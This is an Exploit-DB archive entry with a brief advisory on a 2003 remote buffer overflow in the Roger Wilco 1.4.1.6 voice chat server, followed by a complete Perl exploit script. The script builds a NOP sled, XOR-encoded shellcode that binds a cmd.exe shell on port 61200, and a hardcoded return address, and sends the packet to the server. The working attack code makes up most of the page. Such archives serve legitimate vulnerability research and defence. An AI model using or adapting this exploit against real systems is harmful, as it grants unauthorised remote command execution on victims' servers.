Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun

EDB-ID:

23123

CVE:


EDB Verified:

Author:

D4rkGr3y

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2003-09-08

Vulnerable App: 
source: https://www.securityfocus.com/bid/8566/info

A vulnerability has been reported for various Roger Wilco server releases. The problem occurs server-side, and can be triggered when processing malformed client packets. Specifically, when connecting to a server the Roger Wilco client transmits a packet containing the size of data to be copied into an internal buffer. As a result, a malicious user could modify the size to result in excessive data being copied into a previously allocated buffer. This could ultimately allow for sensitive server memory to be corrupted, potentially resulting in the execution of arbitrary code.

#!/usr/bin/perl
#
#       RogerWilco v1.4.1.6 remote buffer overflow exploit
#  ...just for fun
#
# Binds cmd.exe shell on port 61200.
# Retaddr 0x0122fa44 will works only if roger.exe has md5
# checksum 89f2d9cda1abc1f55cd06181fbdd6e43 (v.1.4.1.6).
# And there is no metter what win32 operation system installed
# (winnxp/2k/nt/me/9x/03).
# Btw, RogerWilco is a kewl Internet Voice chat for gamers (hm).
# Vendor: rogerwilco.gamespy.com.
# Bug founded by Auriemma Luigi (hey dude in da third time ;])
# Advisory: security.nnov.ru/search/document.asp?docid=5074
#
# Greets to all ppl from #m00sec #nerf and #priv8security (EFnet)
#
# d4rkgr3y [d4rk@securitylab.ru] // m00 [www.m00.ru]
#

use IO::Socket;
$host = "127.0.0.1";
$port = "3782";
$retaddr = "\x44\xfa\x22\x01";

$shellcode =
	"\x33\xff". #xor edi,edi
	"\x33\xf6". #xor esi,esi
	"\x33\xdb". #xor ebx,ebx
	"\xB8\x01\xF0\x22\x01". #mov eax,122F020
	#"\xcc". #int3
	"\x83\xC0\x15\x33\xC9\x66\xB9\xD1\x01\x80\x30\x96\x40\xE2\xFA". #decryptor
	#winxp/2k xored portbind shellcode
	"\x15\x7A\xA2\x1D\x62\x7E\xD1\x97\x96\x96\x1F\x90\x69\xA0\xFE\x18\xD8\x98\x7A\x7E\xF7".
	"\x97\x96\x96\x1F\xD0\x9E\x69\xA0\xFE\x3B\x4F\x93\x58\x7E\xC4\x97\x96\x96\x1F\xD0".
	"\x9A\xFE\xFA\xFA\x96\x96\xFE\xA5\xA4\xB8\xF2\xFE\xE1\xE5\xA4\xC9\xC2\x69\xC0\x9E".
	"\x1F\xD0\x92\x69\xA0\xFE\xE4\x68\x25\x80\x7E\xBB\x97\x96\x96\x1F\xD0\x86\x69\xA0".
	"\xFE\xE8\x4E\x74\xE5\x7E\x88\x97\x96\x96\x1F\xD0\x82\x69\xE0\x92\xFE\x5D\x7B\x6A".
	"\xAD\x7E\x98\x97\x96\x96\x1F\xD0\x8E\x69\xE0\x92\xFE\x4F\x9F\x63\x3B\x7E\x68\x96".
	"\x96\x96\x1F\xD0\x8A\x69\xE0\x92\xFE\x32\x8C\xE6\x51\x7E\x78\x96\x96\x96\x1F\xD0".
	"\xB6\x69\xE0\x92\xFE\x32\x3B\xB8\x7F\x7E\x48\x96\x96\x96\x1F\xD0\xB2\x69\xE0\x92".
	"\xFE\x73\xDF\x10\xDF\x7E\x58\x96\x96\x96\x1F\xD0\xBE\x69\xE0\x92\xFE\x71\xEF\x50".
	"\xEF\x7E\x28\x96\x96\x96\x1F\xD0\xBA\xA5\x69\x17\x7A\x06\x97\x96\x96\xC2\xFE\x97".
	"\x97\x96\x96\x69\xC0\x8E\xC6\xC6\xC6\xC6\xD6\xC6\xD6\xC6\x69\xC0\x8A\x1D\x4E\xC1".
	"\xC1\xFE\x94\x96\x79\x86\x1D\x5A\xFC\x80\xC7\xC5\x69\xC0\xB6\xC1\xC5\x69\xC0\xB2".
	"\xC1\xC7\xC5\x69\xC0\xBE\x1D\x46\xFE\xF3\xEE\xF3\x96\xFE\xF5\xFB\xF2\xB8\x1F\xF0".
	"\xA6\x15\x7A\xC2\x1B\xAA\xB2\xA5\x56\xA5\x5F\x15\x57\x83\x3D\x74\x6B\x50\xD2\xB2".
	"\x86\xD2\x68\xD2\xB2\xAB\x1F\xC2\xB2\xDE\x1F\xC2\xB2\xDA\x1F\xC2\xB2\xC6\x1B\xD2".
	"\xB2\x86\xC2\xC6\xC7\xC7\xC7\xFC\x97\xC7\xC7\x69\xE0\xA6\xC7\x69\xC0\x86\x1D\x5A".
	"\xFC\x69\x69\xA7\x69\xC0\x9A\x1D\x5E\xC1\x69\xC0\xBA\x69\xC0\x82\xC3\xC0\xF2\x37".
	"\xA6\x96\x96\x96\x13\x56\xEE\x9A\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\x7D\x9F".
	"\x1D\xD6\xA2\x1D\x3E\x2E\x96\x96\x96\x1D\x53\xC8\xCB\x54\x92\x96\xC5\xC3\xC0\xC1".
	"\x1D\xFA\xB2\x8E\x1D\xD3\xAA\x1D\xC2\x93\xEE\x95\x43\x1D\xDC\x8E\x1D\xCC\xB6\x95".
	"\x4B\x75\xA4\xDF\x1D\xA2\x1D\x95\x63\xA5\x69\x6A\xA5\x56\x3A\xAC\x52\xE2\x91\x57".
	"\x59\x9B\x95\x6E\x7D\x64\xAD\xEA\xB2\x82\xE3\x77\x1D\xCC\xB2\x95\x4B\xF0\x1D\x9A".
	"\xDD\x1D\xCC\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x7D\x94\xA5\x56\x1D\x43\xC9\xC8\xCB".
	"\xCD\x54\x92\x96";


for($i=0;$i<1263-200-490;$i++) {
	$execode .= "\x90";
}

$execode .= "$shellcode";

for($i=0;$i<200;$i++) {
	$execode .= "\x90";
}
print "\n\rRogerWilco v1.4.1.6 remote buffer overflow exploit\n\n=> Connecting to $host:$port.. ";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die " damn\n";
print "ok\n=> Sending exploit buffer... ";
$buf =
	"\x0F\x00\x05\x08\x6A\xD6\x4C\x03".
	"\x96\xED\x3B\xE7\x88\xE2\xA9\x74".
	"channel".
	"\x00".
	"$execode".
	"$retaddr".
	"\x0F\x10\x00\x04".
	"d4rk".
	"\x0F\x11\x00\x04\x00\x00\x00\x02".
	"\x0F\x12\x00\x04\x00\x00\x00\x00";

print $socket "$buf";
print "ok\n=> Exiting... \n\n";
sleep(2);

close($socket);
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services